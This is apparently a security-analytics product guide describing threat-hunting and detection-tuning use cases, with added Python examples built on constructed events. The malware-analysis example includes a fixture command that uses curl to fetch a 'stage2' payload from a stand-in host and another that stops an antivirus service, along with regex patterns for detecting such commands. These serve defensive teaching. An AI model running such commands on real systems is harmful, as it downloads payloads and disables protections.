Malware Analysis
Goal: Identify and investigate potential malware infections within your organization
1. Filters:
- Technique: Malware (consider using a specific malware technique if known)
- Tactics (Any or All): Delivery, Installation, Execution, Lateral Movement, Impact (depending on the desired scope)
2. Axes (Dimension mapped to timeline):
- Choose one or a combination of the following based on your investigative focus:
- "metadata.product_event_type" (to identify events related to file activity; example values that can be mapped to the axes for analysis: "file download", "file execution", "file deletion", "file modify", "process execution")
- "target.process.command_line" (to look for suspicious process execution commands, either at the time of the event or after the occurrence of one of the above events)
Look for commands that:
- Attempt to disable security software (e.g., commands referencing known security software names)
- Download files from untrusted sources (e.g., commands using "wget" or "curl" to download from suspicious URLs)
- Modify system settings (e.g., commands related to registry modifications)
- Spawn new processes with suspicious arguments
- "target.process.file.sha256" (map all hash values on the timeline and look up the values around the time of interest in any threat intel feeds to see whether they have malware or suspicious file characteristics)
- "PRINCIPAL.HOSTNAME" (mapping this dimension to the timeline will help you identify potentially infected or compromised hosts during the specific time of interest, as determined by the above analysis)
- "target.user.userid" (map this field across the timeline to identify potentially compromised user accounts)
- "security_result.threat_name" (additionally mapping this dimension to the axes will help you see whether your security tools already detected any threats related to the suspicious activity)
Inference:
- When using "metadata.product_event_type" on the axes:
- Identify a surge in events like "file download" or "file execution."
- Investigate downloaded files with suspicious characteristics. Look for events like "suspicious file hash detected" or "file downloaded from untrusted source" (potential use for "security_result.threat_name"). Analyze "target.process.file.full_path" for suspicious file names or locations.
- When using "target.process.command_line" on the axes:
- Look for suspicious commands often associated with malware, such as attempts to disable security software or download additional malicious files.
- Investigate processes with unusual command-line arguments or execution paths.
- When using "target.process.file.sha256" on the axes:
- Focus on specific malware hashes you suspect to be involved in an attack.
- Investigate all instances of the identified hash value. Correlate with other indicators like suspicious execution events or network connections.
- Regardless of the Axes chosen, investigate user activity following suspicious events. Look for "EVENT TYPE" related to suspicious process creation or privilege escalation attempts.
- Check for "ATT&CK TECHNIQUES" associated with the downloaded files or suspicious processes, such as "Drive-by Download" or "Remote File Transfer."
- Investigate network connections ("target.ip") following suspicious events. Look for connections to known malicious domains or command-and-control servers.
- Analyze "process.parent_process.name" to identify how suspicious processes were executed (potential malicious script or user action).
Additional Tips:
- Correlate suspicious file downloads with process execution events. Look for "target.process.file.full_path" matching downloaded files and analyze "EVENT TYPE" related to process execution (e.g., "process spawned from unknown source").
- Leverage threat intelligence feeds to identify known malware hashes and associated techniques (potential use for "security_result.threat_name").
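The inference steps above (surge of file events, suspicious command lines, threat-intel hash hits, then the hosts and users around the pivot) carried out over a constructed event timeline. This is an added example, not code from the page or from Signal Analytics; the event records, the threat-intel set, the regex patterns and the 30-minute window are all assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

INTEL_HASHES = {"sha256-evil-01"}  # constructed threat-intel set, not a real feed

def ev(ts, etype, host, user, cmd="", sha="sha256-benign"):  # constructed UDM-style event
    return {"ts": datetime.fromisoformat(ts), "metadata.product_event_type": etype,
            "principal.hostname": host, "target.user.userid": user,
            "target.process.command_line": cmd, "target.process.file.sha256": sha}

EVENTS = [  # constructed sample timeline, not real telemetry; keys are the page's field names
    ev("2024-05-01T08:10", "file download", "ws-02", "bob"),
    ev("2024-05-01T09:02", "file download", "ws-01", "alice"),
    ev("2024-05-01T09:04", "file download", "ws-01", "alice"),
    ev("2024-05-01T09:06", "file download", "ws-03", "carol"),
    ev("2024-05-01T09:09", "process execution", "ws-01", "alice",
       cmd='net stop "Acme Antivirus Service"'),
    ev("2024-05-01T09:11", "process execution", "ws-01", "alice",
       cmd="curl http://files.invalid/stage2.bin -o s.bin", sha="sha256-evil-01"),
    ev("2024-05-01T10:30", "process execution", "ws-02", "bob", cmd="notepad.exe notes.txt"),
]

# The command-line checks the page lists, as (label, pattern) pairs.
COMMAND_CHECKS = [
    ("disable security software",
     re.compile(r"(?i)(?=.*\b(antivirus|defender|firewall)\b)(?=.*\b(stop|disable|off)\b)")),
    ("download from untrusted source", re.compile(r"(?i)\b(wget|curl)\b.*https?://")),
    ("registry modification", re.compile(r"(?i)\breg(\.exe)?\s+add\b")),
]

def classify_command(cmd):
    return [label for label, rx in COMMAND_CHECKS if rx.search(cmd)]

def surge_hours(events, etype, threshold=3):
    """Hours in which `etype` occurred at least `threshold` times (the page's 'surge')."""
    per_hour = Counter(e["ts"].replace(minute=0) for e in events
                       if e["metadata.product_event_type"] == etype)
    return sorted(h for h, n in per_hour.items() if n >= threshold)

def pivots(events, intel):
    """Events to pivot on: a suspicious command line or a threat-intel hash hit."""
    out = []
    for e in events:
        reasons = classify_command(e["target.process.command_line"])
        if e["target.process.file.sha256"] in intel:
            reasons.append("threat intel hash match")
        if reasons:
            out.append((e, reasons))
    return out

def scope(events, pivot_events, window=timedelta(minutes=30)):
    """Hosts and users active within `window` of any pivot: the candidate compromised set."""
    near = [e for p, _ in pivot_events for e in events if abs(e["ts"] - p["ts"]) <= window]
    return {e["principal.hostname"] for e in near}, {e["target.user.userid"] for e in near}
```

Run against the sample, the 09:00 hour shows the download surge, the two 09:09 and 09:11 events become pivots, and the scope narrows to ws-01/ws-03 and alice/carol; bob's earlier download and later notepad run fall outside the window.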
Phishing
Goal: Identify and investigate potential phishing campaigns targeting your organization.
Filters:
- Technique: Phishing
- Tactics (Any or All): Execution, Persistence, Privilege Escalation, Defense Evasion
Axes (Dimensions):
- Choose one or a combination of the following:
- network.email.from: To identify suspicious email senders
- metadata.product_event_type: To identify user interactions with emails (e.g., "email opened", "link clicked")
- network.email.to: To identify targeted recipients
- principal.hostname: To identify potentially compromised devices
Inference:
- Identify Mass Phishing Attempts: Look for emails with the same subject line sent from various senders (network.email.from) to multiple recipients (network.email.to).
- Analyze User Interaction: Investigate if recipients from the same phishing campaign (same subject, sender) opened the emails (metadata.product_event_type: "email opened") or clicked on any links within (potential "Execution" tactic).
- Correlate User Activity with Tactics: For users who opened suspicious emails, investigate if subsequent user activity indicates tactics like Persistence (e.g., establishing remote access), Privilege Escalation (attempting to gain admin rights), or Defense Evasion (disabling security software). Look for suspicious events in "metadata.product_event_type" based on user enrichment from "network.email.to".
- Process Analysis: When user execution techniques are identified (based on tactics), investigate associated process names and parent processes to understand the potential impact and origin of the executed code.
- Threat Name Correlation: Analyze if any security controls triggered threat names ("security_result.threat_name") associated with the compromised users. This can provide additional context about the potential malware or exploit involved.
- Threat Intelligence Integration: Leverage threat intelligence feeds to identify suspicious domains or IP addresses accessed by users who interacted with phishing emails. This can help confirm malicious intent and identify broader campaign indicators.
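The mass-phishing inference above (same subject, many senders, many recipients), the user-interaction step, and the correlation of affected users with post-compromise tactics, worked over constructed records. This is an added example, not code from the page or from Signal Analytics; the email and interaction records, the "subject" key, the "tactic" enrichment on follow-on events, and the sender/recipient thresholds are all assumptions.

```python
from collections import defaultdict

# Constructed email records (not real mail logs); keys are the page's field names.
def mail(sender, rcpt, subject):
    return {"network.email.from": sender, "network.email.to": rcpt, "subject": subject}

EMAILS = [
    mail("a@sender1.invalid", "u1@corp.invalid", "Invoice overdue"),
    mail("b@sender2.invalid", "u2@corp.invalid", "Invoice overdue"),
    mail("c@sender3.invalid", "u3@corp.invalid", "Invoice overdue"),
    mail("hr@corp.invalid", "u1@corp.invalid", "Benefits update"),
    mail("hr@corp.invalid", "u2@corp.invalid", "Benefits update"),
]
# Constructed interaction events, keyed to the campaign by subject.
INTERACTIONS = [
    {"target.user.userid": "u1@corp.invalid", "metadata.product_event_type": "email opened", "subject": "Invoice overdue"},
    {"target.user.userid": "u1@corp.invalid", "metadata.product_event_type": "link clicked", "subject": "Invoice overdue"},
    {"target.user.userid": "u2@corp.invalid", "metadata.product_event_type": "email opened", "subject": "Invoice overdue"},
    {"target.user.userid": "u2@corp.invalid", "metadata.product_event_type": "email opened", "subject": "Benefits update"},
]
# Constructed follow-on events; "tactic" is an assumed enrichment (None = benign).
FOLLOW_ON = [
    {"target.user.userid": "u1@corp.invalid", "metadata.product_event_type": "security software disabled", "tactic": "Defense Evasion"},
    {"target.user.userid": "u2@corp.invalid", "metadata.product_event_type": "file opened", "tactic": None},
    {"target.user.userid": "u3@corp.invalid", "metadata.product_event_type": "new scheduled task", "tactic": "Persistence"},
]

def mass_phishing_campaigns(emails, min_senders=2, min_recipients=3):
    """Subjects sent by >= min_senders distinct senders to >= min_recipients distinct recipients."""
    by_subject = defaultdict(lambda: {"senders": set(), "recipients": set()})
    for m in emails:
        by_subject[m["subject"]]["senders"].add(m["network.email.from"])
        by_subject[m["subject"]]["recipients"].add(m["network.email.to"])
    return {s: v for s, v in by_subject.items()
            if len(v["senders"]) >= min_senders and len(v["recipients"]) >= min_recipients}

def interacting_users(campaigns, interactions):
    """Per campaign subject, each recipient's strongest interaction: 'opened' or 'Execution' (link clicked)."""
    users = defaultdict(dict)
    for i in interactions:
        if i["subject"] in campaigns:
            level = "Execution" if i["metadata.product_event_type"] == "link clicked" else "opened"
            if users[i["subject"]].get(i["target.user.userid"]) != "Execution":
                users[i["subject"]][i["target.user.userid"]] = level
    return dict(users)

POST_COMPROMISE = ("Persistence", "Privilege Escalation", "Defense Evasion")

def follow_on_tactics(users, events):
    """Follow-on events for the given users whose tactic is one the page lists as post-compromise."""
    return [(e["target.user.userid"], e["tactic"], e["metadata.product_event_type"])
            for e in events if e["target.user.userid"] in users and e["tactic"] in POST_COMPROMISE]
```

Note that u3 received the campaign email and later shows a Persistence event, but never appears in the interaction events, so the page's "users who opened" correlation does not surface it; that gap is worth checking separately rather than assuming the interaction feed is complete.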
User Compromise Detection
Scenario: A malicious actor gains unauthorized access to a legitimate user account.
Goal: Identify and investigate potential user compromise within your organization.
Filters:
- Techniques (Any or All): Focus on techniques associated with post-compromise activities, excluding those related to standard user access (e.g., Credential Access):
- Defense Evasion
- Privilege Escalation
- Lateral Movement
- Impact (depending on the desired scope)
Axes:
- "EVENT TYPE" (to identify suspicious user activities) - Look for events that deviate from typical user behavior, such as:
- Failed login attempts: Especially from geographically distant locations compared to the user's usual login patterns.
- Successful logins outside of normal working hours: Investigate logins during unusual times for the specific user.
- Access to unauthorized resources: Analyze attempts to access resources not typically used by the user or outside of their designated permissions.
- Suspicious file downloads: Investigate downloads from untrusted sources or file types not typically accessed by the user.
- Process creation events: Look for creation of processes associated with suspicious file executions or privilege escalation attempts.
- Data exfiltration attempts: Identify events related to large data transfers or uploads to external locations.
- "PRINCIPAL.HOSTNAME" or "target.user.userid" (depending on the focus)
- "PRINCIPAL.HOSTNAME" (to identify potentially compromised devices): This helps you identify which devices might be compromised by analyzing the user activity originating from them.
- "target.user.userid" (to identify potentially compromised user accounts): This helps you focus on user accounts exhibiting suspicious activity patterns.
Inference:
- Look for a sequence of events suggesting a potential attack progression. This might involve:
- Failed login attempts followed by successful ones from an unusual location.
- Access to unauthorized resources or downloads of suspicious files.
- Attempts to escalate privileges or move laterally within the network.
- Correlate user/host activity with "security_result.threat_name" to identify detections by security controls related to compromised accounts. Look for alerts triggered by suspicious login attempts, privilege escalation, or malware execution.
- Investigate network connections ("target.ip") following suspicious logins or activity. Look for connections to known malicious domains or unusual outbound traffic patterns.
Additional Tips:
- Look for a combination of suspicious events rather than relying on a single indicator. A single failed login from an unusual location might not be a compromise, but multiple failed login attempts followed by a successful one could be a red flag.
- Look for a sequence of events suggesting a potential attack progression. This might involve a successful login attempt from an unusual location followed by attempts to escalate privileges, access sensitive data, or move laterally within the network.
Remember: This is a sample scenario. You can adapt the filters, axes, and inferences based on your specific security posture and needs.
By utilizing Signal Analytics' ability to analyze user activity over time and identify anomalies, you can proactively detect and investigate potential user compromise incidents, minimizing the damage caused by malicious actors.
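The attack-progression sequence described above (failed logins, then a success from an unusual location or outside working hours, then escalation or lateral movement), implemented over constructed login events. This is an added example, not code from the page or from Signal Analytics; the login records, the "location" and "outcome" keys, the per-user location baseline, the working-hours range and the "stage" label on follow-on events are all assumptions.

```python
from datetime import datetime, timedelta

# Constructed login events (not real telemetry); keys are the page's field names, plus
# an assumed "location" label that a geo enrichment would supply.
def login(ts, user, host, outcome, location):
    return {"ts": datetime.fromisoformat(ts), "target.user.userid": user,
            "principal.hostname": host, "outcome": outcome, "location": location}

LOGINS = [
    login("2024-05-01T22:01", "alice", "vpn-gw", "failed", "City-X"),
    login("2024-05-01T22:02", "alice", "vpn-gw", "failed", "City-X"),
    login("2024-05-01T22:03", "alice", "vpn-gw", "failed", "City-X"),
    login("2024-05-01T22:05", "alice", "vpn-gw", "success", "City-X"),
    login("2024-05-02T09:00", "alice", "ws-01", "success", "HQ"),
    login("2024-05-02T09:01", "bob", "ws-02", "failed", "Remote-Y"),   # lone failure: not enough
    login("2024-05-02T09:05", "bob", "ws-02", "success", "HQ"),
]
# Constructed follow-on events, labelled with the stage they correspond to on the page.
FOLLOW_ON = [
    {"ts": datetime.fromisoformat("2024-05-01T22:20"), "target.user.userid": "alice", "stage": "privilege escalation"},
    {"ts": datetime.fromisoformat("2024-05-01T22:40"), "target.user.userid": "alice", "stage": "lateral movement"},
    {"ts": datetime.fromisoformat("2024-05-02T09:10"), "target.user.userid": "bob", "stage": "privilege escalation"},
]
BASELINE = {"alice": {"HQ"}, "bob": {"HQ", "Remote-Y"}}  # assumed usual locations per user
WORK_HOURS = range(8, 19)

def compromise_sequences(logins, baseline, min_failures=2, window=timedelta(minutes=15)):
    """Flag a successful login preceded by >= min_failures failures within `window` when it
    also comes from a non-baseline location or outside working hours. One unusual failure
    on its own is deliberately not enough (the page's single-indicator caveat)."""
    by_user = {}
    for e in sorted(logins, key=lambda e: e["ts"]):
        by_user.setdefault(e["target.user.userid"], []).append(e)
    findings = []
    for user, events in by_user.items():
        for i, e in enumerate(events):
            if e["outcome"] != "success":
                continue
            failures = [p for p in events[:i] if p["outcome"] == "failed" and e["ts"] - p["ts"] <= window]
            reasons = [r for r, hit in (("unusual location", e["location"] not in baseline.get(user, set())),
                                        ("outside working hours", e["ts"].hour not in WORK_HOURS)) if hit]
            if len(failures) >= min_failures and reasons:
                findings.append({"user": user, "host": e["principal.hostname"], "ts": e["ts"],
                                 "failures": len(failures), "reasons": reasons})
    return findings

def progression(findings, events, window=timedelta(hours=2)):
    """Attach the same user's later events within `window` to each flagged login, in order."""
    for f in findings:
        later = [e for e in sorted(events, key=lambda e: e["ts"])
                 if e["target.user.userid"] == f["user"] and timedelta(0) <= e["ts"] - f["ts"] <= window]
        f["progression"] = [e["stage"] for e in later]
    return findings
```

Bob's single failure followed by a normal-hours login from a baseline location is not flagged even when the failure threshold is lowered to one, which is the combination-of-indicators point the tips make.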
Data Engineering Use Case: Optimizing Parsers
Goal: Identify and prioritize data sources (parsers) requiring improvement in MITRE ATT&CK tactic and technique mapping.
Scenario: Security data is enriched with MITRE ATT&CK framework for better threat detection and analysis. However, some data sources might not have complete mappings, resulting in events categorized as "Others" within the MITRE ATT&CK framework.
Filters:
- MITRE Technique: "Others"
(This selects events where the parser couldn't assign a specific MITRE technique)
Axes:
- Not applicable in this case (focusing on specific data sources)
Inference and Action:
- Axes to look for in Aggregated Insights: "metadata.product_event_type" (to identify the specific event types associated with the "Others" category)
- Identify the unique "metadata.product_event_type" values associated with the "Others" selection in the MITRE Technique filter. These event types represent data points where the current parser struggles to assign a specific MITRE technique.
- Generate a report highlighting the identified "metadata.product_event_type" values for the data engineering team.
- This report informs the data engineering team about specific event types where the current parser needs improvement in MITRE ATT&CK mapping.
Benefits:
- By identifying limitations in parser capabilities, you can prioritize data engineering efforts to improve the accuracy and completeness of MITRE ATT&CK mapping across different data sources.
- This leads to a more comprehensive understanding of potential threats based on the MITRE ATT&CK framework, enabling more effective threat detection and response strategies.
Additional Notes:
- This use case leverages Signal Analytics' filtering and aggregation capabilities to pinpoint specific data sources requiring improvement.
- The identified "metadata.product_event_type" values serve as actionable insights for the data engineering team to focus their efforts on enhancing parser logic and MITRE ATT&CK mapping accuracy.
Detection Engineering: Fine-tuning Detection Signals
Goal: Reduce false positives and improve the efficacy of a detection rule with a high signal volume.
Scenario: A specific detection rule in your security system is generating a large number of signals, potentially leading to alert fatigue and hindering your ability to identify real threats.
Implementation:
Data Source:
- Security event data, including rule-triggered signals.
Filters:
- Detection Rule: Focus on the specific rule with the highest number of signals.
Axes:
Choose one or a combination of the following:
- "Detection Rule Name" (to identify the detection rule generating the majority of signals)
- "Log Source" (to identify the log source generating the majority of signals)
- "metadata.eventType" (to identify the type of security event triggering the signals) - This can provide additional context about the nature of the events causing the high signal volume.
- "security.events.principal.ip" or "security.events.target.ip" (to identify specific hosts or IP addresses associated with the signals)
- "security.events.principal.user.userid" or "security.events.target.user.userid" (to identify users involved in signal generation)
Inference:
- Identify Dominant Signal Source: Analyze the "Detection Rule Name" aggregate insights on the left pane to identify the detection rule that is causing the highest number of signals.
- Using "Log Source", pinpoint the log source contributing the most signals to the chosen detection rule.
- Investigate Specific Hosts/IPs/Users: If a specific source dominates, further investigate by looking at "security.events.principal.ip", "security.events.target.ip", or "security.events.principal.user.userid". This helps identify if a particular host, IP address, or user is triggering a large number of signals.
- Analyze Signal Characteristics: Within the filtered timeframe, investigate the specific events and characteristics of the generated signals. This can involve analyzing fields like:
- securityResult.threatName: To understand the potential threat category associated with the signals.
- securityResult.category: To determine the broader security risk classification.
- metadata.eventType: To identify the type of security event triggering the signals.
Action:
- Whitelisting: If the investigation reveals benign activity from specific hosts, IPs, or users that consistently trigger false positives, consider whitelisting them to exclude them from future detections by this rule.
- Rule Threshold Tuning: Based on the analysis of signal characteristics, you might need to adjust the detection rule threshold to reduce sensitivity and avoid generating signals for harmless activity. This could involve adjusting parameters related to event frequency, severity, or specific indicators within the rule logic.
- Rule Logic Refinement (Optional): In complex scenarios, further refinement of the detection rule logic might be necessary. This could involve adding additional filters or conditions to narrow down the scope of events triggering the rule and reduce false positives.
Benefits:
By fine-tuning detection signals, you can:
- Reduce alert fatigue for security analysts by focusing on high-fidelity alerts.
- Improve the effectiveness of your detection rules by minimizing false positives.
- Optimize security operations by prioritizing resources for investigating genuine threats.
Threat Hunting with Signal Analytics: Identifying Rare Events
Goal: Identify detection rules triggering on rare events that might indicate novel threats or security blind spots.
Scenario: Traditional security monitoring focuses on high-volume alerts. However, low-volume or rare events detected by specific rules can also be significant and warrant investigation.
Implementation:
- Data Source: Security event data, including rule-triggered signals.
- Filters:
- Low Signal Count: Focus on detection rules with the lowest number of signals within a specific time frame (e.g., past week, month).
Axes:
- Choose one or a combination of the following:
- "Detection Rule" (to identify the specific rule triggering the rare event)
- "security.events.principal.ip" or "security.events.target.ip" (to identify source or destination IPs involved)
- "security.events.principal.user.userid" or "security.events.target.user.userid" (to identify users involved)
- "metadata.eventType" (to identify the type of security event triggered)
Inference:
- Identify Rules with Rare Events: Analyze the "Detection Rule" aggregate analysis on the left pane to pinpoint rules with the least number of signals within the chosen timeframe.
- Investigate Event Details: For the identified rules, delve deeper into the specific security events triggered using the remaining Y-axis fields. This can reveal details like:
- Source and destination IP addresses (security.events.principal.ip or security.events.target.ip) to understand the attack origin or potential target.
- Usernames (security.events.principal.user.userid or security.events.target.user.userid) to identify potentially compromised accounts or unusual user activity.
- Security event type (metadata.eventType) to comprehend the nature of the detected event (e.g., failed login attempt, file access).
Action:
- Investigate the Event: Conduct a thorough investigation of the rare event. This might involve:
- Analyzing the full context of the security event, including logs from surrounding timeframes.
- Checking threat intelligence feeds for indicators of compromise (IOCs) related to the observed event.
- Investigating user behavior associated with the event (if a user is involved).
- Rule Evaluation: Depending on the investigation findings, consider:
- Updating the detection rule logic to better capture similar events in the future.
- Tuning the rule threshold to avoid missing future occurrences of the rare event.
Benefits:
- Proactive threat detection by identifying potential security blind spots through rare events.
- Improved security posture by investigating anomalies that might indicate novel threats.
- Enhanced threat intelligence by providing insights into potential new attack vectors.
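The three aggregation use cases above share one mechanic, so this single added example covers all of them: the dominant-source drill-down from "Fine-tuning Detection Signals" (rule, then log source, then host, stopping when no single value dominates), the lowest-signal-count rules from "Identifying Rare Events", and the "Others" event-type worklist from "Optimizing Parsers". It is not code from the page or from Signal Analytics; the signal and event records, the "mitre_technique" key standing in for the MITRE Technique filter, and the 50% dominance threshold are assumptions.

```python
from collections import Counter
from datetime import datetime

# Constructed signal records (not real data); keys are the page's field names.
def sig(ts, rule, source, ip):
    return {"ts": datetime.fromisoformat(ts), "Detection Rule Name": rule,
            "Log Source": source, "security.events.principal.ip": ip}

SIGNALS = (
    [sig("2024-05-07T10:00", "Brute Force Login", "vpn", "10.0.0.5")] * 6
    + [sig("2024-05-07T11:00", "Brute Force Login", "vpn", "10.0.0.9"),
       sig("2024-05-07T12:00", "Brute Force Login", "edr", "10.0.0.7"),
       sig("2024-05-05T08:00", "Rare Admin Tool", "edr", "10.0.0.7"),
       sig("2024-04-10T08:00", "New Service Installed", "edr", "10.0.0.3")]
)
# Constructed events for the parser use case; "mitre_technique" stands for the MITRE Technique filter value.
EVENTS = [
    {"metadata.product_event_type": "usb_device_connected", "mitre_technique": "Others"},
    {"metadata.product_event_type": "usb_device_connected", "mitre_technique": "Others"},
    {"metadata.product_event_type": "print_job_submitted", "mitre_technique": "Others"},
    {"metadata.product_event_type": "process_start", "mitre_technique": "T1059"},
]

def drill_down(records, keys, share=0.5):
    """Follow the dominant value along `keys` (rule -> log source -> host) for as long as it
    accounts for at least `share` of the remaining records; returns (key, value, share) steps."""
    path, pool = [], list(records)
    for key in keys:
        value, n = Counter(r[key] for r in pool).most_common(1)[0]
        if n / len(pool) < share:
            break
        path.append((key, value, round(n / len(pool), 2)))
        pool = [r for r in pool if r[key] == value]
    return path

def rare_rules(records, since_iso, n=2):
    """The `n` rules with the fewest signals since `since_iso`, rarest first."""
    since = datetime.fromisoformat(since_iso)
    counts = Counter(r["Detection Rule Name"] for r in records if r["ts"] >= since)
    return sorted(counts.items(), key=lambda kv: kv[1])[:n]

def unmapped_event_types(events):
    """Event types whose technique is "Others", most frequent first: the parser team's worklist."""
    return Counter(e["metadata.product_event_type"] for e in events
                   if e["mitre_technique"] == "Others").most_common()
```

The drill-down ending at a single host holding most of the rule's signals is the whitelisting candidate the Action section describes; if it stops at the rule level, the volume is spread out and threshold or logic tuning is the better fit.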
Other use cases
1. Unusual Network Activity Investigation:
- Axes: Source IP, Destination IP, Destination Port
- Filter: Detection Rule: Unusual Network Behavior
- Context: Examine the network signals from a specific user or host to detect and investigate any unusual patterns, potentially indicating a security threat.
2. Insider Threat Detection:
- Axes: Principal Host, Target Host, Principal Commands, Event types, Applications accessed, File Names
- Filter: User Name
- Context: Analyze signals related to specific users accessing sensitive files on their machines, providing insights into potential insider threats.
3. Malware Spread Analysis:
- Axes: Source IP, Destination IP, File Names
- Filter: Detection Rule: Malware Propagation
- Context: Investigate the spread of malware across the network by examining the source and destination IPs along with the files involved during the detection period.
4. Threats Timeline:
- Axes: Threat types
- Filter: None
- Context: A look at what kinds of threats were detected over time in the environment.